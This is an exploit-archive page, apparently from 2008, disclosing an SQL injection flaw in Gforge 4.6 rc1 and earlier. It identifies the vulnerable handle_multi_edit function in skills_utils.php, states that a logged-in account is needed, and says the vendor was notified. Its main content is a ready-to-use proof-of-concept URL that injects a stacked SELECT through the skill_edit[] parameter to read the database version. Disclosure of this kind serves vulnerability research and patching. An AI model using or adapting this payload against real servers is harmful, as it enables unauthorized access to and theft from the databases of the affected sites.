[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability
# Published : 2008-10-09
# Author : beford
# Previous Title : Gforge <= 4.5.19 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability
Gforge <= 4.6 rc1 skill_edit SQL injection
Vendor Notified: 2008-10-06
Impact: zomg!
Note: should work regardless magic_quotes_gpc setting.
Requires: Creating an account and be logged in
Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php
http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
# www.Syue.com [2008-10-09]